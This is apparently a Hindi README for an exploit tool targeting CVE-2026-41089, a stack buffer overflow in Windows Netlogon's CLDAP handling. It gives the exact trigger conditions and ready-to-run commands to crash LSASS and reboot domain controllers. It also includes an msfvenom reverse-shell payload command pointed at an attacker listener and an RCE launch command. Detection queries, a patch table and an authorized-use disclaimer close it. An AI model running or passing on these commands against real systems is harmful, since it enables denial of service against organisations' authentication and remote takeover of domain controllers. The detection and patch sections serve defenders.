
CVE-2026-41089 विंडोज़ Netlogon सेवा में एक गंभीर रिमोट कोड निष्पादन भेद्यता है, जिसमें एक ही पैकेट lsass.exe को क्रैश कर सकता है, जिससे डोमेन कंट्रोलर लगभग 30-60 सेकंड में रीस्टार्ट हो जाता है। इस अवधि के दौरान उस DC के सभी डोमेन प्रमाणीकरण विफल हो जाएंगे।
CVE-ID: CVE-2026-41089
CVSS: 9.8 (गंभीर)
CWE: CWE-121 (स्टैक-आधारित बफर ओवरफ्लो)
हमला वेक्टर: UDP/389 (CLDAP SearchRequest)
प्रभाव: दूरस्थ कोड निष्पादन (RCE) / सेवा अस्वीकार (DoS)
प्रभावित संस्करण: विंडोज सर्वर 2012 R2 ~ 2025 (डोमेन कंट्रोलर)
पैच: मई 2026 संचयी अद्यतन
netlogon.dll में NetpLogonPutUnicodeString फ़ंक्शन में CLDAP खोज अनुरोधों को संसाधित करते समय स्टैक बफर ओवरफ्लो भेद्यता है। यह फ़ंक्शन बाइट लंबाई बजट प्राप्त करता है, लेकिन इसे WCHAR गणना के रूप में व्याख्यायित करता है, जिसके परिणामस्वरूप लेखन अपेक्षित से 2 गुना होता है।
ओवरफ्लो NlGetLocalPingResponse फ़ंक्शन के 528 बाइट (264 ushort) फिक्स्ड स्टैक बफर में होता है। हमलावर-नियंत्रित User फ़ील्ड और सर्वर का स्वयं का DNS डोमेन नाम इस बफर को भरते हैं, अंततः GS सुरक्षा कुकी को ओवरराइट करते हैं, जिससे __report_gsfailure और क्रैश होता है।
lsass.exeNtVer=0x02 (पुराने, भेद्य BuildSamLogonResponse पथ का उपयोग बाध्य करता है)User फ़ील्ड की लंबाई ≥ ~130 वर्ण (बाइनरी सीमा लगभग 260 बाइट UTF-16)नोट:
NtVer=0x16(कई सार्वजनिक डिटेक्शन स्क्रिप्ट द्वारा उपयोग किया गया मान) सुरक्षितBuildSamLogonResponseExपथ को ट्रिगर करता है, भेद्यता को ट्रिगर नहीं करता।
| मोड | विवरण |
|---|---|
--mode dos | विशेष रूप से तैयार किया गया CLDAP पैकेट भेजता है, जिससे LSASS क्रैश होता है और DC रिबूट होता है (~60 सेकंड प्रमाणीकरण डाउनटाइम) |
--mode rce | दूरस्थ कोड निष्पादन का प्रयास (अनुसंधान स्तर, शेलकोड की आवश्यकता है) |
--mode scan | विभिन्न NtVer मानों के प्रति प्रतिक्रियाओं को स्कैन करता है, लक्ष्य DC की फिंगरप्रिंटिंग करता है |
--mode auto | स्वचालित रूप से पता लगाता है और सर्वोत्तम हमला रणनीति चुनता है |
एक एकल पैकेट lsass.exe को क्रैश कर सकता है, जिससे डोमेन कंट्रोलर लगभग 30-60 सेकंड में रीबूट हो जाता है। इस अवधि के दौरान उस DC के सभी डोमेन प्रमाणीकरण विफल होंगे।
# मूल उपयोग — 3 पैकेट भेजें
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos
# एकल पैकेट त्वरित हमला
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1
# आक्रामक मोड — 5 पैकेट एक साथ
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1
⚠️ अनुसंधान स्तर — वास्तविक वातावरण में अविश्वसनीय और अस्थिर।
RCE निम्नलिखित चुनौतियों का सामना करता है:
# शेलकोड उत्पन्न करें
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
-f raw -o shellcode.bin
# RCE पेलोड भेजें
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
--shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444
# लक्ष्य DC की फिंगरप्रिंटिंग करें
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan
अपेक्षित आउटपुट उदाहरण (पैच किया गया लक्ष्य):
NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)
अपेक्षित आउटपुट उदाहरण (अपैच किया गया लक्ष्य):
NtVer=0x00000002 → TIMEOUT (5001 ms) ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)
यदि NtVer=0x02 टाइमआउट करता है जबकि अन्य संस्करण सामान्य रूप से प्रतिक्रिया देते हैं, तो लक्ष्य संभवतः भेद्य है।
| पैरामीटर | विवरण | डिफ़ॉल्ट |
|---|---|---|
-l, --user-len | उपयोगकर्ता नाम फ़ील्ड की लंबाई (ASCII वर्ण) | 180 |
--ntver | NtVer मान (हेक्स, जैसे 0x02) | 0x02 |
--count | भेजे जाने वाले DoS पैकेट की संख्या | 3 |
--delay | पैकेट के बीच विलंब (सेकंड) | 0.5 |
-t, --timeout | सॉकेट टाइमआउट (सेकंड) | 5.0 |
--json | JSON प्रारूप में परिणाम आउटपुट करें | — |
--raw | भेजने से पहले कच्चा पैकेट हेक्स प्रिंट करें | — |
--quiet | बैनर आउटपुट दबाएँ | — |
--shellcode-file | कस्टम शेलकोड फ़ाइल (रॉ x64) | — |
--lhost | रिवर्स शेल श्रवण पता | — |
--lport | रिवर्स शेल श्रवण पोर्ट | 4444 |
# विंडोज सर्वर (अपैच) पर लंबा डोमेन नाम वाला DC बनाएँ:
# 1. डोमेन कंट्रोलर के रूप में पदोन्नत करें (बहुत लंबा DNS डोमेन नाम, जैसे "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. सुनिश्चित करें कि मई 2026 से पहले का पैच स्थापित है
# 3. हमलावर मशीन से चलाएँ:
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. DC के क्रैश और रीबूट का निरीक्षण करें
User > 100 बाइट और NtVer = 0x02Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)
index=wineventlog source="WinEventLog:Application" EventID=1000
Process_Name="lsass.exe" Exception_Code="0xc0000409"
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"
| विंडोज सर्वर संस्करण | पैच बिल्ड संख्या | नोट्स |
|---|---|---|
| सर्वर 2012 | 6.2.9200.26079 | ESU |
| सर्वर 2012 R2 | 6.3.9600.23181 | ESU |
| सर्वर 2016 | 10.0.14393.9140 | |
| सर्वर 2019 | 10.0.17763.8755 | |
| सर्वर 2022 | 10.0.20348.5074 | |
| सर्वर 2022 23H2 | 10.0.25398.2330 | |
| सर्वर 2025 | 10.0.26100.32772 |
यह टूल केवल अधिकृत सुरक्षा मूल्यांकन, पैठ परीक्षण, CTF प्रतियोगिताओं और रक्षा अनुसंधान के लिए है। स्पष्ट लिखित प्राधिकरण के बिना किसी भी सिस्टम पर इस टूल का उपयोग अवैध है। उपयोगकर्ता सभी कानूनी दायित्व स्वयं वहन करता है।